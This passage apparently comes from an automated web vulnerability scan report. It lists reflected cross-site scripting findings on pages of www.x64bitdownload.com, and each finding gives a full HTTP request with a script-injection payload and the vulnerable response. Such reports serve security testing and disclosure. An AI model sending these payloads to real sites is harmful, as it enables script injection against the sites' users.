Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ec"><script>alert(1)</script>6e593dfd62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1" />
...[SNIP]...

4.1521. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c51"><script>alert(1)</script>c2a577b8281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281" />
...[SNIP]...

4.1522. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d83d"><script>alert(1)</script>0d95b09fc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1" />
...[SNIP]...

4.1523. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82621"><script>alert(1)</script>c53057f24a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1" />
...[SNIP]...

4.1524. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4af"><script>alert(1)</script>ad7bd7c1eb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9" />
...[SNIP]...

4.1525. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 817d3"><script>alert(1)</script>83b84f29eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1" />
...[SNIP]...

4.1526. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c23"><script>alert(1)</script>323d5f8b558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558" />
...[SNIP]...

4.1527. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63229"><script>alert(1)</script>158ae792632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1" />
...[SNIP]...

4.1528. http://www.x64bitdownload.com/64-bit-forum-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dd1"><script>alert(1)</script>b828f5462c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1" />
...[SNIP]...

4.1529. http://www.x64bitdownload.com/64-bit-forums-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a7c"><script>alert(1)</script>2d7fe0d2eb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0" />
...[SNIP]...

4.1530. http://www.x64bitdownload.com/64-bit-forums-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaef"><script>alert(1)</script>f7180ec1d07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:37 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1" />
...[SNIP]...

4.1531. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d91"><script>alert(1)</script>fc86d6334b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b" />
...[SNIP]...

4.1532. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ac7"><script>alert(1)</script>733f69cdf35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1" />
...[SNIP]...

4.1533. http://www.x64bitdownload.com/64-bit-group-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d17"><script>alert(1)</script>831c8190191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191" />
...[SNIP]...

4.1534. http://www.x64bitdownload.com/64-bit-group-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d774c"><script>alert(1)</script>b7a347567e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1" />
...[SNIP]...

4.1535. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6e64"><script>alert(1)</script>c521abd2a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

